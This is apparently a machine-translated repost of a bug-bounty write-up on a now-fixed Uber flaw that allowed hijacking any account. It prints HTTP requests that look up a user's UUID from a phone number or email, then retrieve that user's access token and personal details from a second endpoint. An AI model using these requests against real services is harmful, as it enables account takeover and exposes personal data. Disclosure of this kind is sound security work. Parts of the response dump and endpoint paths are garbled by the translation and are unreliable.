Shulou(Shulou.com)05/31 Report--

This article introduces how to hijack any Uber registered account through the Uber API interface, the content is very detailed, interested friends can refer to, I hope it can be helpful to you.

The following vulnerabilities are arbitrary account hijacking vulnerabilities of Uber, which affect Uber drivers, taxi passengers (Rider), third-party partners and catering delivery (Eats) registered accounts. An attacker can obtain the UUID of a user's registered account through a Uber API interface, and then use UUID to initiate a request through another Uber API interface to obtain the access control token (token) information of the corresponding UUID account from its response. In order to achieve account hijacking.

General situation and impact of vulnerabilities

The problem first occurs in an API interface of Uber. If the mobile phone number or email address reserved for user registration is provided in its POST request, the Uber back-end service can respond to return the UUID number of the corresponding user account. After that, in another Uber API interface, the access control token (Access Token) of the corresponding user to the Uber mobile application APP can be further obtained by using the obtained user UUID number. With the access control token (token), the victim can initiate operations such as account hijacking, location tracking, money transaction and downloading the bus route, seriously endangering the security of the victim's account.

Vulnerability recurrence step 1 get the UUID number of any Uber registered user from API

In the following API API POST request of Uber, if you provide the reserved mobile phone number or email address of the user (third party partner, passenger, catering delivery registration account), after the request is executed, we will get the user's UUID number information in the response message. Such as the following: obtain the user's UUID by registering a reserved mobile phone number:

Request:

POST / p3/fleet-manager/\ _ rpc?rpc=addDriverV2 HTTP/1.1Host: partners.uber.com {"nationalPhoneNumber": "99999xxxxx", "countryCode": "1"}

Response:

{"status": "failure", "data": {"code": 1009, "message": "Driver '47d063f8-0xx5eMury xxxxMub 01a murxxxx' not found"}}

If the user's registration reservation phone number 99999xxxxx is provided in the request, the user's UUID number will be returned in the response message: '47d063f8-0xx5emur4eb4murxxxxxxxxxxxxxxxxxxx'.

The following obtains the user's UUID by registering the reserved email address:

Request:

POST / p3/fleet-manager/\ _ rpc?rpc=addDriverV2 HTTP/1.1Host: partners.uber.com {"email": "xxx@gmail.com"}

Response:

{"status": "failure", "data": {"code": 1009, "message": "Driver 'ca111b95-1111-4396-b907-83abxx5f7371e' not found"}}

The user registers the reserved email address address xxx@gmail.com, and the same Uber backend response returns the user's UUID number: 'Ca111b95-1111-4396-b907-83abxxx5f7371e'.

Step 2 get the UUID access control token (token) from another API

After obtaining the UUID number of any of the above users, sensitive information such as access control token (Access Token), geographical location and home address of the corresponding user to the Uber mobile application APP can be further obtained by using the obtained user UUID number in another Uber API interface. With an access control token (Access Token), you can completely hijack any Uber account, from which you can see his travel route, taxi request, payment information, and so on. The following is the proof of my test account.

Obtain information such as an access control token (Access Token) through another Uber API:

Request:

POST / marketplace/\ _ rpc?rpc=getConsentScreenDetails HTTP/1.1Host: bonjour.uber.comConnection: closeContent-Length: 67Accept: application/jsonOrigin: [https://bonjour.uber.com](https://bonjour.uber.com)x-csrf-token: xxxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 / 14 / 3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36DNT: 1Content-Type: application/jsonAccept-Encoding: gzip, deflateAccept-Language: en-US,en Q=0.9Cookie: xxxxx {"language": "en", "userUuid": "xxxx-776-4xxxx1bd-861a-837xxx604ce"}

The UUID contained in the above request is: xxxx-776-4xxxx1bd-861a-837xxx604ce. After the request is executed under this identity, the response from the Uber backend is as follows:

{"status": "success", "data": {"data": {"language": "en", "userUuid": "xxxxxx1e"}, "getUser": {"uuid": "cxxxxxc5f7371e", "firstname": "Maxxxx", "lastname": "XXXX", "role": "PARTNER", "languageId": 1 CountryId: 77, mobile: null, mobileToken: 1234, mobileCountryId: 77, mobileCountryCode: "+ 91", hasAmbiguousMobileCountry: false, lastConfirmedMobileCountryId: 77, email: "xxxx@gmail.com", "emailToken": "xxxxxxxx", "hasConfirmedMobile": "no" "hasOptedInSmsMarketing": false, "hasConfirmedEmail": true, "gratuity": 0.3, "nickname": "abc@gmail.com", "location": "00000", "banned": false, "cardio": false, "token": "b8038ec4143bb4xxxxxx72d", "fraudScore": 0, "inviterUuid": null PictureUrl: "xxxxx.jpeg", "recentFareSplitterUuids": ["xxx"], "lastSelectedPaymentProfileUuid": "xxxxxx", "lastSelectedPaymentProfileGoogleWalletUuid": null, "inviteCode": {"promotionCodeId": xxxxx, "promotionCodeUuid": "xxxx", "promotionCode": "manishas105" "createdAt": {"type": "Buffer", "data": [0meme 0pje 76je 76je 21215101]}, "updatedAt": {"type": "Buffer", "data": [0meme 0min1 pint 75pr 65pr 211je 61re9]}} "driverInfo": {"contactinfo": "999999999xx", "contactinfoCountryCode": "+ 91", "driverLicense": "None", "firstDriverTripUuid": null, "iphone": null, "partnerUserUuid": "xxxxxxx", "receiveSms": true, "twilioNumber": null, "twilioNumberFormatted": null "cityknowledgeScore": 0, "createdAt": {"type": "Buffer", "data": [0pje 0pje 84pr 21je 124je 80je 52]}, "updatedAt": {"type": "Buffer", "data": [0pr 0mel 1meme 86pm 152pr 7pm 41j77]}, "deletedAt": null "driverStatus": "APPLIED", "driverFlowType": "UBERX", "statusLocks": null, "contactinfoCountryIso2Code": "KR", "driverEngagement": null, "courierEngagement": null}, "partnerInfo": {"address": "Nxxxxxxx", "territoryUuid": "xxxxxx" "company": "None", "address2": "None", "cityId": 130, "cityName": "None", "firstPartnerTripUuid": null, "preferredCollectionPaymentProfileUuid": null, "phone": "", "phoneCountryCode": "+ 91", "state": "None" "vatNumber": "None", "zipcode": "None", "createdAt": {"type": "Buffer", "data": [0 0pje 84je 84je 124pr 52]}, "updatedAt": {"type": "Buffer", "data": [0pany 0 1Jing 101, deletedAt: null, "fleetTypes": [], fleetServices: [], "isFleet": true}, "analytics": {"signupLat": 133.28741199, "signupLng": 11177.1111 "signupTerritoryUuid": "xxxxx", "signupPromoId": null, "signupForm": "iphone", "signupSessionId": "xxxxxxx", "signupAppVersion": "2.64.1", "signupAttributionMethod": null, "createdAt": {"type": "Buffer", "data": 21 type 219jue 1]}, "updatedAt": {"type": "Buffer", "data": [0pje 0pje 76pr 21je 219jue 1]}, "signupCityId": 130, "signupDeviceId": null, "signupReferralId": null, "signupPromoCode": null, "signupPromoCodeUuid": null "signupPromoUuid": null, "signupMethod": "REGULAR"}, "createdAt": {"type": "Buffer", "data": [0meme 0mel 76je 21215153]}, "updatedAt": {"type": "Buffer", "data": [0Jing 0Jing 1J 102jue 81J 35153135]} "deletedAt": null, "tenancy": "uber/production", "mobileConfirmationStatus": "MOBILE_NOT_CONFIRMED", "nationalId": null, "nationalIdType": null, "merchantLocation": null, "lastConfirmedMobile": "xxxxxxxxxx", "requestedDeletionAt": null, "dateOfBirth": xxxxxx, "userTypes": null "preferredName": "xxxxxxxx", "freightInfo": null, "tempPictureUrl": null, "identityVerified": null, "paymentEntityType": null, "riderEngagement": null, "identityRejectReasonUuid": null, "genderInferred": null, "genderIdentity": null, "genderDocumented": null, "riderIneligibleWdw": null "defaultPaymentProfileByProduct": null, "loginEligibility": null}, "getDisclosureVersionUuid": ", getLocaleCopy": null}}

It can be seen that all the sensitive information of the account corresponding to the UUID is returned in the response message, including the access control token information of the user to the Uber mobile application APP. Through the use of the token information, the hijacking of any Uber account can be realized. After the vulnerability was reported, the Uber remedied the vulnerability by enforcing authorization restrictions on the current request and deleting sensitive information in the response message.

This is enough about how to hijack any Uber registered account through the Uber API interface. I hope the above content can be helpful to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.